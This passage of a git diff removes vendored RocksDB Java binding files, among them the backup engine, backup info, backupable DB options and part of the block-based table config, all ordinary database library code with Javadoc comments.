-   */
-  T setTargetFileSizeBase(
-      long targetFileSizeBase);
-
-  /**
-   * The target file size for compaction.
-   * This targetFileSizeBase determines a level-1 file size.
-   * Target file size for level L can be calculated by
-   * targetFileSizeBase * (targetFileSizeMultiplier ^ (L-1))
-   * For example, if targetFileSizeBase is 2MB and
-   * target_file_size_multiplier is 10, then each file on level-1 will
-   * be 2MB, and each file on level 2 will be 20MB,
-   * and each file on level-3 will be 200MB.
-   * by default targetFileSizeBase is 2MB.
-   *
-   * @return the target size of a level-0 file.
-   *
-   * @see #targetFileSizeMultiplier()
-   */
-  long targetFileSizeBase();
-
-  /**
-   * targetFileSizeMultiplier defines the size ratio between a
-   * level-L file and level-(L+1) file.
-   * By default target_file_size_multiplier is 1, meaning
-   * files in different levels have the same target.
-   *
-   * @param multiplier the size ratio between a level-(L+1) file
-   *     and level-L file.
-   * @return the reference to the current options.
-   */
-  T setTargetFileSizeMultiplier(
-      int multiplier);
-
-  /**
-   * targetFileSizeMultiplier defines the size ratio between a
-   * level-(L+1) file and level-L file.
-   * By default targetFileSizeMultiplier is 1, meaning
-   * files in different levels have the same target.
-   *
-   * @return the size ratio between a level-(L+1) file and level-L file.
-   */
-  int targetFileSizeMultiplier();
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @param multiplier the ratio between the total size of level-(L+1)
-   *     files and the total size of level-L files for all L.
-   * @return the reference to the current options.
-   *
-   * See {@link MutableColumnFamilyOptionsInterface#setMaxBytesForLevelBase(long)}
-   */
-  T setMaxBytesForLevelMultiplier(double multiplier);
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @return the ratio between the total size of level-(L+1) files and
-   *     the total size of level-L files for all L.
-   *
-   * See {@link MutableColumnFamilyOptionsInterface#maxBytesForLevelBase()}
-   */
-  double maxBytesForLevelMultiplier();
-
-  /**
-   * Different max-size multipliers for different levels.
-   * These are multiplied by max_bytes_for_level_multiplier to arrive
-   * at the max-size of each level.
-   *
-   * Default: 1
-   *
-   * @param maxBytesForLevelMultiplierAdditional The max-size multipliers
-   *   for each level
-   * @return the reference to the current options.
-   */
-  T setMaxBytesForLevelMultiplierAdditional(
-      int[] maxBytesForLevelMultiplierAdditional);
-
-  /**
-   * Different max-size multipliers for different levels.
-   * These are multiplied by max_bytes_for_level_multiplier to arrive
-   * at the max-size of each level.
-   *
-   * Default: 1
-   *
-   * @return The max-size multipliers for each level
-   */
-  int[] maxBytesForLevelMultiplierAdditional();
-
-  /**
-   * All writes will be slowed down to at least delayed_write_rate if estimated
-   * bytes needed to be compaction exceed this threshold.
-   *
-   * Default: 64GB
-   *
-   * @param softPendingCompactionBytesLimit The soft limit to impose on
-   *   compaction
-   * @return the reference to the current options.
-   */
-  T setSoftPendingCompactionBytesLimit(
-      long softPendingCompactionBytesLimit);
-
-  /**
-   * All writes will be slowed down to at least delayed_write_rate if estimated
-   * bytes needed to be compaction exceed this threshold.
-   *
-   * Default: 64GB
-   *
-   * @return The soft limit to impose on compaction
-   */
-  long softPendingCompactionBytesLimit();
-
-  /**
-   * All writes are stopped if estimated bytes needed to be compaction exceed
-   * this threshold.
-   *
-   * Default: 256GB
-   *
-   * @param hardPendingCompactionBytesLimit The hard limit to impose on
-   *   compaction
-   * @return the reference to the current options.
-   */
-  T setHardPendingCompactionBytesLimit(
-      long hardPendingCompactionBytesLimit);
-
-  /**
-   * All writes are stopped if estimated bytes needed to be compaction exceed
-   * this threshold.
-   *
-   * Default: 256GB
-   *
-   * @return The hard limit to impose on compaction
-   */
-  long hardPendingCompactionBytesLimit();
-
-  /**
-   * An iteration-&gt;Next() sequentially skips over keys with the same
-   * user-key unless this option is set. This number specifies the number
-   * of keys (with the same userkey) that will be sequentially
-   * skipped before a reseek is issued.
-   * Default: 8
-   *
-   * @param maxSequentialSkipInIterations the number of keys could
-   *     be skipped in a iteration.
-   * @return the reference to the current options.
-   */
-  T setMaxSequentialSkipInIterations(
-      long maxSequentialSkipInIterations);
-
-  /**
-   * An iteration-&gt;Next() sequentially skips over keys with the same
-   * user-key unless this option is set. This number specifies the number
-   * of keys (with the same userkey) that will be sequentially
-   * skipped before a reseek is issued.
-   * Default: 8
-   *
-   * @return the number of keys could be skipped in a iteration.
-   */
-  long maxSequentialSkipInIterations();
-
-  /**
-   * Maximum number of successive merge operations on a key in the memtable.
-   *
-   * When a merge operation is added to the memtable and the maximum number of
-   * successive merges is reached, the value of the key will be calculated and
-   * inserted into the memtable instead of the merge operation. This will
-   * ensure that there are never more than max_successive_merges merge
-   * operations in the memtable.
-   *
-   * Default: 0 (disabled)
-   *
-   * @param maxSuccessiveMerges the maximum number of successive merges.
-   * @return the reference to the current options.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setMaxSuccessiveMerges(
-      long maxSuccessiveMerges);
-
-  /**
-   * Maximum number of successive merge operations on a key in the memtable.
-   *
-   * When a merge operation is added to the memtable and the maximum number of
-   * successive merges is reached, the value of the key will be calculated and
-   * inserted into the memtable instead of the merge operation. This will
-   * ensure that there are never more than max_successive_merges merge
-   * operations in the memtable.
-   *
-   * Default: 0 (disabled)
-   *
-   * @return the maximum number of successive merges.
-   */
-  long maxSuccessiveMerges();
-
-  /**
-   * After writing every SST file, reopen it and read all the keys.
-   *
-   * Default: false
-   *
-   * @param paranoidFileChecks true to enable paranoid file checks
-   * @return the reference to the current options.
-   */
-  T setParanoidFileChecks(
-      boolean paranoidFileChecks);
-
-  /**
-   * After writing every SST file, reopen it and read all the keys.
-   *
-   * Default: false
-   *
-   * @return true if paranoid file checks are enabled
-   */
-  boolean paranoidFileChecks();
-
-  /**
-   * Measure IO stats in compactions and flushes, if true.
-   *
-   * Default: false
-   *
-   * @param reportBgIoStats true to enable reporting
-   * @return the reference to the current options.
-   */
-  T setReportBgIoStats(
-      boolean reportBgIoStats);
-
-  /**
-   * Determine whether IO stats in compactions and flushes are being measured
-   *
-   * @return true if reporting is enabled
-   */
-  boolean reportBgIoStats();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupEngine.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupEngine.java
deleted file mode 100644
index 7639945..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupEngine.java
+++ /dev/null
@@ -1,221 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import java.util.List;
-
-/**
- * BackupEngine allows you to backup
- * and restore the database
- *
- * Be aware, that `new BackupEngine` takes time proportional to the amount
- * of backups. So if you have a slow filesystem to backup (like HDFS)
- * and you have a lot of backups then restoring can take some time.
- * That's why we recommend to limit the number of backups.
- * Also we recommend to keep BackupEngine alive and not to recreate it every
- * time you need to do a backup.
- */
-public class BackupEngine extends RocksObject implements AutoCloseable {
-
-  protected BackupEngine(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Opens a new Backup Engine
-   *
-   * @param env The environment that the backup engine should operate within
-   * @param options Any options for the backup engine
-   *
-   * @return A new BackupEngine instance
-   * @throws RocksDBException thrown if the backup engine could not be opened
-   */
-  public static BackupEngine open(final Env env,
-      final BackupableDBOptions options) throws RocksDBException {
-    return new BackupEngine(open(env.nativeHandle_, options.nativeHandle_));
-  }
-
-  /**
-   * Captures the state of the database in the latest backup
-   *
-   * Just a convenience for {@link #createNewBackup(RocksDB, boolean)} with
-   * the flushBeforeBackup parameter set to false
-   *
-   * @param db The database to backup
-   *
-   * Note - This method is not thread safe
-   *
-   * @throws RocksDBException thrown if a new backup could not be created
-   */
-  public void createNewBackup(final RocksDB db) throws RocksDBException {
-    createNewBackup(db, false);
-  }
-
-  /**
-   * Captures the state of the database in the latest backup
-   *
-   * @param db The database to backup
-   * @param flushBeforeBackup When true, the Backup Engine will first issue a
-   *                          memtable flush and only then copy the DB files to
-   *                          the backup directory. Doing so will prevent log
-   *                          files from being copied to the backup directory
-   *                          (since flush will delete them).
-   *                          When false, the Backup Engine will not issue a
-   *                          flush before starting the backup. In that case,
-   *                          the backup will also include log files
-   *                          corresponding to live memtables. The backup will
-   *                          always be consistent with the current state of the
-   *                          database regardless of the flushBeforeBackup
-   *                          parameter.
-   *
-   * Note - This method is not thread safe
-   *
-   * @throws RocksDBException thrown if a new backup could not be created
-   */
-  public void createNewBackup(
-      final RocksDB db, final boolean flushBeforeBackup)
-      throws RocksDBException {
-    assert (isOwningHandle());
-    createNewBackup(nativeHandle_, db.nativeHandle_, flushBeforeBackup);
-  }
-
-  /**
-   * Gets information about the available
-   * backups
-   *
-   * @return A list of information about each available backup
-   */
-  public List<BackupInfo> getBackupInfo() {
-    assert (isOwningHandle());
-    return getBackupInfo(nativeHandle_);
-  }
-
-  /**
-   * <p>Returns a list of corrupted backup ids. If there
-   * is no corrupted backup the method will return an
-   * empty list.</p>
-   *
-   * @return array of backup ids as int ids.
-   */
-  public int[] getCorruptedBackups() {
-    assert(isOwningHandle());
-    return getCorruptedBackups(nativeHandle_);
-  }
-
-  /**
-   * <p>Will delete all the files we don't need anymore. It will
-   * do the full scan of the files/ directory and delete all the
-   * files that are not referenced.</p>
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void garbageCollect() throws RocksDBException {
-    assert(isOwningHandle());
-    garbageCollect(nativeHandle_);
-  }
-
-  /**
-   * Deletes old backups, keeping just the latest numBackupsToKeep
-   *
-   * @param numBackupsToKeep The latest n backups to keep
-   *
-   * @throws RocksDBException thrown if the old backups could not be deleted
-   */
-  public void purgeOldBackups(
-      final int numBackupsToKeep) throws RocksDBException {
-    assert (isOwningHandle());
-    purgeOldBackups(nativeHandle_, numBackupsToKeep);
-  }
-
-  /**
-   * Deletes a backup
-   *
-   * @param backupId The id of the backup to delete
-   *
-   * @throws RocksDBException thrown if the backup could not be deleted
-   */
-  public void deleteBackup(final int backupId) throws RocksDBException {
-    assert (isOwningHandle());
-    deleteBackup(nativeHandle_, backupId);
-  }
-
-  /**
-   * Restore the database from a backup
-   *
-   * IMPORTANT: if options.share_table_files == true and you restore the DB
-   * from some backup that is not the latest, and you start creating new
-   * backups from the new DB, they will probably fail!
-   *
-   * Example: Let's say you have backups 1, 2, 3, 4, 5 and you restore 3.
-   * If you add new data to the DB and try creating a new backup now, the
-   * database will diverge from backups 4 and 5 and the new backup will fail.
-   * If you want to create new backup, you will first have to delete backups 4
-   * and 5.
-   *
-   * @param backupId The id of the backup to restore
-   * @param dbDir The directory to restore the backup to, i.e. where your
-   *              database is
-   * @param walDir The location of the log files for your database,
-   *               often the same as dbDir
-   * @param restoreOptions Options for controlling the restore
-   *
-   * @throws RocksDBException thrown if the database could not be restored
-   */
-  public void restoreDbFromBackup(
-      final int backupId, final String dbDir, final String walDir,
-      final RestoreOptions restoreOptions) throws RocksDBException {
-    assert (isOwningHandle());
-    restoreDbFromBackup(nativeHandle_, backupId, dbDir, walDir,
-        restoreOptions.nativeHandle_);
-  }
-
-  /**
-   * Restore the database from the latest backup
-   *
-   * @param dbDir The directory to restore the backup to, i.e. where your
-   *              database is
-   * @param walDir The location of the log files for your database, often the
-   *               same as dbDir
-   * @param restoreOptions Options for controlling the restore
-   *
-   * @throws RocksDBException thrown if the database could not be restored
-   */
-  public void restoreDbFromLatestBackup(
-      final String dbDir, final String walDir,
-      final RestoreOptions restoreOptions) throws RocksDBException {
-    assert (isOwningHandle());
-    restoreDbFromLatestBackup(nativeHandle_, dbDir, walDir,
-        restoreOptions.nativeHandle_);
-  }
-
-  private native static long open(final long env,
-      final long backupableDbOptions) throws RocksDBException;
-
-  private native void createNewBackup(final long handle, final long dbHandle,
-      final boolean flushBeforeBackup) throws RocksDBException;
-
-  private native List<BackupInfo> getBackupInfo(final long handle);
-
-  private native int[] getCorruptedBackups(final long handle);
-
-  private native void garbageCollect(final long handle) throws RocksDBException;
-
-  private native void purgeOldBackups(final long handle,
-      final int numBackupsToKeep) throws RocksDBException;
-
-  private native void deleteBackup(final long handle, final int backupId)
-      throws RocksDBException;
-
-  private native void restoreDbFromBackup(final long handle, final int backupId,
-      final String dbDir, final String walDir, final long restoreOptionsHandle)
-      throws RocksDBException;
-
-  private native void restoreDbFromLatestBackup(final long handle,
-      final String dbDir, final String walDir, final long restoreOptionsHandle)
-      throws RocksDBException;
-
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupInfo.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupInfo.java
deleted file mode 100644
index 10f4186..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupInfo.java
+++ /dev/null
@@ -1,66 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * Instances of this class describe a Backup made by
- * {@link org.rocksdb.BackupEngine}.
- */
-public class BackupInfo {
-
-  /**
-   * Package private constructor used to create instances
-   * of BackupInfo by {@link org.rocksdb.BackupEngine}
-   *
-   * @param backupId id of backup
-   * @param timestamp timestamp of backup
-   * @param size size of backup
-   * @param numberFiles number of files related to this backup.
-   */
-  BackupInfo(final int backupId, final long timestamp, final long size,
-      final int numberFiles) {
-    backupId_ = backupId;
-    timestamp_ = timestamp;
-    size_ = size;
-    numberFiles_ = numberFiles;
-  }
-
-  /**
-   *
-   * @return the backup id.
-   */
-  public int backupId() {
-    return backupId_;
-  }
-
-  /**
-   *
-   * @return the timestamp of the backup.
-   */
-  public long timestamp() {
-    return timestamp_;
-  }
-
-  /**
-   *
-   * @return the size of the backup
-   */
-  public long size() {
-    return size_;
-  }
-
-  /**
-   *
-   * @return the number of files of this backup.
-   */
-  public int numberFiles() {
-    return numberFiles_;
-  }
-
-  private int backupId_;
-  private long timestamp_;
-  private long size_;
-  private int numberFiles_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupableDBOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupableDBOptions.java
deleted file mode 100644
index 8bb4143..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupableDBOptions.java
+++ /dev/null
@@ -1,465 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.io.File;
-
-/**
- * <p>BackupableDBOptions to control the behavior of a backupable database.
- * It will be used during the creation of a {@link org.rocksdb.BackupEngine}.
- * </p>
- * <p>Note that dispose() must be called before an Options instance
- * become out-of-scope to release the allocated memory in c++.</p>
- *
- * @see org.rocksdb.BackupEngine
- */
-public class BackupableDBOptions extends RocksObject {
-
-  private Env backupEnv = null;
-  private Logger infoLog = null;
-  private RateLimiter backupRateLimiter = null;
-  private RateLimiter restoreRateLimiter = null;
-
-  /**
-   * <p>BackupableDBOptions constructor.</p>
-   *
-   * @param path Where to keep the backup files. Has to be different than db
-   *   name. Best to set this to {@code db name_ + "/backups"}
-   * @throws java.lang.IllegalArgumentException if illegal path is used.
-   */
-  public BackupableDBOptions(final String path) {
-    super(newBackupableDBOptions(ensureWritableFile(path)));
-  }
-
-  private static String ensureWritableFile(final String path) {
-    final File backupPath = path == null ? null : new File(path);
-    if (backupPath == null || !backupPath.isDirectory() ||
-        !backupPath.canWrite()) {
-      throw new IllegalArgumentException("Illegal path provided.");
-    } else {
-      return path;
-    }
-  }
-
-  /**
-   * <p>Returns the path to the BackupableDB directory.</p>
-   *
-   * @return the path to the BackupableDB directory.
-   */
-  public String backupDir() {
-    assert(isOwningHandle());
-    return backupDir(nativeHandle_);
-  }
-
-  /**
-   * Backup Env object. It will be used for backup file I/O. If it's
-   * null, backups will be written out using DBs Env. Otherwise
-   * backup's I/O will be performed using this object.
-   *
-   * If you want to have backups on HDFS, use HDFS Env here!
-   *
-   * Default: null
-   *
-   * @param env The environment to use
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupEnv(final Env env) {
-    assert(isOwningHandle());
-    setBackupEnv(nativeHandle_, env.nativeHandle_);
-    this.backupEnv = env;
-    return this;
-  }
-
-  /**
-   * Backup Env object. It will be used for backup file I/O. If it's
-   * null, backups will be written out using DBs Env. Otherwise
-   * backup's I/O will be performed using this object.
-   *
-   * If you want to have backups on HDFS, use HDFS Env here!
-   *
-   * Default: null
-   *
-   * @return The environment in use
-   */
-  public Env backupEnv() {
-    return this.backupEnv;
-  }
-
-  /**
-   * <p>Share table files between backups.</p>
-   *
-   * @param shareTableFiles If {@code share_table_files == true}, backup will
-   *   assume that table files with same name have the same contents. This
-   *   enables incremental backups and avoids unnecessary data copies. If
-   *   {@code share_table_files == false}, each backup will be on its own and
-   *   will not share any data with other backups.
-   *
-   * <p>Default: true</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setShareTableFiles(final boolean shareTableFiles) {
-    assert(isOwningHandle());
-    setShareTableFiles(nativeHandle_, shareTableFiles);
-    return this;
-  }
-
-  /**
-   * <p>Share table files between backups.</p>
-   *
-   * @return boolean value indicating if SST files will be shared between
-   *     backups.
-   */
-  public boolean shareTableFiles() {
-    assert(isOwningHandle());
-    return shareTableFiles(nativeHandle_);
-  }
-
-  /**
-   * Set the logger to use for Backup info and error messages
-   *
-   * @param logger The logger to use for the backup
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setInfoLog(final Logger logger) {
-    assert(isOwningHandle());
-    setInfoLog(nativeHandle_, logger.nativeHandle_);
-    this.infoLog = logger;
-    return this;
-  }
-
-  /**
-   * Set the logger to use for Backup info and error messages
-   *
-   * Default: null
-   *
-   * @return The logger in use for the backup
-   */
-  public Logger infoLog() {
-    return this.infoLog;
-  }
-
-  /**
-   * <p>Set synchronous backups.</p>
-   *
-   * @param sync If {@code sync == true}, we can guarantee you'll get consistent
-   *   backup even on a machine crash/reboot. Backup process is slower with sync
-   *   enabled. If {@code sync == false}, we don't guarantee anything on machine
-   *   reboot. However, chances are some of the backups are consistent.
-   *
-   * <p>Default: true</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setSync(final boolean sync) {
-    assert(isOwningHandle());
-    setSync(nativeHandle_, sync);
-    return this;
-  }
-
-  /**
-   * <p>Are synchronous backups activated.</p>
-   *
-   * @return boolean value if synchronous backups are configured.
-   */
-  public boolean sync() {
-    assert(isOwningHandle());
-    return sync(nativeHandle_);
-  }
-
-  /**
-   * <p>Set if old data will be destroyed.</p>
-   *
-   * @param destroyOldData If true, it will delete whatever backups there are
-   *   already.
-   *
-   * <p>Default: false</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setDestroyOldData(final boolean destroyOldData) {
-    assert(isOwningHandle());
-    setDestroyOldData(nativeHandle_, destroyOldData);
-    return this;
-  }
-
-  /**
-   * <p>Returns if old data will be destroyed will performing new backups.</p>
-   *
-   * @return boolean value indicating if old data will be destroyed.
-   */
-  public boolean destroyOldData() {
-    assert(isOwningHandle());
-    return destroyOldData(nativeHandle_);
-  }
-
-  /**
-   * <p>Set if log files shall be persisted.</p>
-   *
-   * @param backupLogFiles If false, we won't backup log files. This option can
-   *   be useful for backing up in-memory databases where log file are
-   *   persisted, but table files are in memory.
-   *
-   * <p>Default: true</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupLogFiles(final boolean backupLogFiles) {
-    assert(isOwningHandle());
-    setBackupLogFiles(nativeHandle_, backupLogFiles);
-    return this;
-  }
-
-  /**
-   * <p>Return information if log files shall be persisted.</p>
-   *
-   * @return boolean value indicating if log files will be persisted.
-   */
-  public boolean backupLogFiles() {
-    assert(isOwningHandle());
-    return backupLogFiles(nativeHandle_);
-  }
-
-  /**
-   * <p>Set backup rate limit.</p>
-   *
-   * @param backupRateLimit Max bytes that can be transferred in a second during
-   *   backup. If 0 or negative, then go as fast as you can.
-   *
-   * <p>Default: 0</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupRateLimit(long backupRateLimit) {
-    assert(isOwningHandle());
-    backupRateLimit = (backupRateLimit <= 0) ? 0 : backupRateLimit;
-    setBackupRateLimit(nativeHandle_, backupRateLimit);
-    return this;
-  }
-
-  /**
-   * <p>Return backup rate limit which described the max bytes that can be
-   * transferred in a second during backup.</p>
-   *
-   * @return numerical value describing the backup transfer limit in bytes per
-   *   second.
-   */
-  public long backupRateLimit() {
-    assert(isOwningHandle());
-    return backupRateLimit(nativeHandle_);
-  }
-
-  /**
-   * Backup rate limiter. Used to control transfer speed for backup. If this is
-   * not null, {@link #backupRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @param backupRateLimiter The rate limiter to use for the backup
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupRateLimiter(final RateLimiter backupRateLimiter) {
-    assert(isOwningHandle());
-    setBackupRateLimiter(nativeHandle_, backupRateLimiter.nativeHandle_);
-    this.backupRateLimiter = backupRateLimiter;
-    return this;
-  }
-
-  /**
-   * Backup rate limiter. Used to control transfer speed for backup. If this is
-   * not null, {@link #backupRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @return The rate limiter in use for the backup
-   */
-  public RateLimiter backupRateLimiter() {
-    assert(isOwningHandle());
-    return this.backupRateLimiter;
-  }
-
-  /**
-   * <p>Set restore rate limit.</p>
-   *
-   * @param restoreRateLimit Max bytes that can be transferred in a second
-   *   during restore. If 0 or negative, then go as fast as you can.
-   *
-   * <p>Default: 0</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setRestoreRateLimit(long restoreRateLimit) {
-    assert(isOwningHandle());
-    restoreRateLimit = (restoreRateLimit <= 0) ? 0 : restoreRateLimit;
-    setRestoreRateLimit(nativeHandle_, restoreRateLimit);
-    return this;
-  }
-
-  /**
-   * <p>Return restore rate limit which described the max bytes that can be
-   * transferred in a second during restore.</p>
-   *
-   * @return numerical value describing the restore transfer limit in bytes per
-   *   second.
-   */
-  public long restoreRateLimit() {
-    assert(isOwningHandle());
-    return restoreRateLimit(nativeHandle_);
-  }
-
-  /**
-   * Restore rate limiter. Used to control transfer speed during restore. If
-   * this is not null, {@link #restoreRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @param restoreRateLimiter The rate limiter to use during restore
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setRestoreRateLimiter(final RateLimiter restoreRateLimiter) {
-    assert(isOwningHandle());
-    setRestoreRateLimiter(nativeHandle_, restoreRateLimiter.nativeHandle_);
-    this.restoreRateLimiter = restoreRateLimiter;
-    return this;
-  }
-
-  /**
-   * Restore rate limiter. Used to control transfer speed during restore. If
-   * this is not null, {@link #restoreRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @return The rate limiter in use during restore
-   */
-  public RateLimiter restoreRateLimiter() {
-    assert(isOwningHandle());
-    return this.restoreRateLimiter;
-  }
-
-  /**
-   * <p>Only used if share_table_files is set to true. If true, will consider
-   * that backups can come from different databases, hence a sst is not uniquely
-   * identified by its name, but by the triple (file name, crc32, file length)
-   * </p>
-   *
-   * @param shareFilesWithChecksum boolean value indicating if SST files are
-   *   stored using the triple (file name, crc32, file length) and not its name.
-   *
-   * <p>Note: this is an experimental option, and you'll need to set it manually
-   * turn it on only if you know what you're doing*</p>
-   *
-   * <p>Default: false</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setShareFilesWithChecksum(
-      final boolean shareFilesWithChecksum) {
-    assert(isOwningHandle());
-    setShareFilesWithChecksum(nativeHandle_, shareFilesWithChecksum);
-    return this;
-  }
-
-  /**
-   * <p>Return of share files with checksum is active.</p>
-   *
-   * @return boolean value indicating if share files with checksum
-   *     is active.
-   */
-  public boolean shareFilesWithChecksum() {
-    assert(isOwningHandle());
-    return shareFilesWithChecksum(nativeHandle_);
-  }
-
-  /**
-   * Up to this many background threads will copy files for
-   * {@link BackupEngine#createNewBackup(RocksDB, boolean)} and
-   * {@link BackupEngine#restoreDbFromBackup(int, String, String, RestoreOptions)}
-   *
-   * Default: 1
-   *
-   * @param maxBackgroundOperations The maximum number of background threads
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setMaxBackgroundOperations(
-      final int maxBackgroundOperations) {
-    assert(isOwningHandle());
-    setMaxBackgroundOperations(nativeHandle_, maxBackgroundOperations);
-    return this;
-  }
-
-  /**
-   * Up to this many background threads will copy files for
-   * {@link BackupEngine#createNewBackup(RocksDB, boolean)} and
-   * {@link BackupEngine#restoreDbFromBackup(int, String, String, RestoreOptions)}
-   *
-   * Default: 1
-   *
-   * @return The maximum number of background threads
-   */
-  public int maxBackgroundOperations() {
-    assert(isOwningHandle());
-    return maxBackgroundOperations(nativeHandle_);
-  }
-
-  /**
-   * During backup user can get callback every time next
-   * {@link #callbackTriggerIntervalSize()} bytes being copied.
-   *
-   * Default: 4194304
-   *
-   * @param callbackTriggerIntervalSize The interval size for the
-   *     callback trigger
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setCallbackTriggerIntervalSize(
-      final long callbackTriggerIntervalSize) {
-    assert(isOwningHandle());
-    setCallbackTriggerIntervalSize(nativeHandle_, callbackTriggerIntervalSize);
-    return this;
-  }
-
-  /**
-   * During backup user can get callback every time next
-   * {@link #callbackTriggerIntervalSize()} bytes being copied.
-   *
-   * Default: 4194304
-   *
-   * @return The interval size for the callback trigger
-   */
-  public long callbackTriggerIntervalSize() {
-    assert(isOwningHandle());
-    return callbackTriggerIntervalSize(nativeHandle_);
-  }
-
-  private native static long newBackupableDBOptions(final String path);
-  private native String backupDir(long handle);
-  private native void setBackupEnv(final long handle, final long envHandle);
-  private native void setShareTableFiles(long handle, boolean flag);
-  private native boolean shareTableFiles(long handle);
-  private native void setInfoLog(final long handle, final long infoLogHandle);
-  private native void setSync(long handle, boolean flag);
-  private native boolean sync(long handle);
-  private native void setDestroyOldData(long handle, boolean flag);
-  private native boolean destroyOldData(long handle);
-  private native void setBackupLogFiles(long handle, boolean flag);
-  private native boolean backupLogFiles(long handle);
-  private native void setBackupRateLimit(long handle, long rateLimit);
-  private native long backupRateLimit(long handle);
-  private native void setBackupRateLimiter(long handle, long rateLimiterHandle);
-  private native void setRestoreRateLimit(long handle, long rateLimit);
-  private native long restoreRateLimit(long handle);
-  private native void setRestoreRateLimiter(final long handle,
-      final long rateLimiterHandle);
-  private native void setShareFilesWithChecksum(long handle, boolean flag);
-  private native boolean shareFilesWithChecksum(long handle);
-  private native void setMaxBackgroundOperations(final long handle,
-      final int maxBackgroundOperations);
-  private native int maxBackgroundOperations(final long handle);
-  private native void setCallbackTriggerIntervalSize(final long handle,
-      long callbackTriggerIntervalSize);
-  private native long callbackTriggerIntervalSize(final long handle);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java
deleted file mode 100644
index 2d847de..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java
+++ /dev/null
@@ -1,452 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * The config for plain table sst format.
- *
- * BlockBasedTable is a RocksDB's default SST file format.
- */
-public class BlockBasedTableConfig extends TableFormatConfig {
-
-  public BlockBasedTableConfig() {
-    noBlockCache_ = false;
-    blockCacheSize_ = 8 * 1024 * 1024;
-    blockCacheNumShardBits_ = 0;
-    blockSize_ = 4 * 1024;
-    blockSizeDeviation_ = 10;
-    blockRestartInterval_ = 16;
-    wholeKeyFiltering_ = true;
-    filter_ = null;
-    cacheIndexAndFilterBlocks_ = false;
-    pinL0FilterAndIndexBlocksInCache_ = false;
-    hashIndexAllowCollision_ = true;
-    blockCacheCompressedSize_ = 0;
-    blockCacheCompressedNumShardBits_ = 0;
-    checksumType_ = ChecksumType.kCRC32c;
-    indexType_ = IndexType.kBinarySearch;
-    formatVersion_ = 0;
-  }
-
-  /**
-   * Disable block cache. If this is set to true,
-   * then no block cache should be used, and the block_cache should
-   * point to a {@code nullptr} object.
-   * Default: false
-   *
-   * @param noBlockCache if use block cache
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setNoBlockCache(final boolean noBlockCache) {
-    noBlockCache_ = noBlockCache;
-    return this;
-  }
-
-  /**
-   * @return if block cache is disabled
-   */
-  public boolean noBlockCache() {
-    return noBlockCache_;
-  }
-
-  /**
-   * Set the amount of cache in bytes that will be used by RocksDB.
-   * If cacheSize is non-positive, then cache will not be used.
-   * DEFAULT: 8M
-   *
-   * @param blockCacheSize block cache size in bytes
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockCacheSize(final long blockCacheSize) {
-    blockCacheSize_ = blockCacheSize;
-    return this;
-  }
-
-  /**
-   * @return block cache size in bytes
-   */
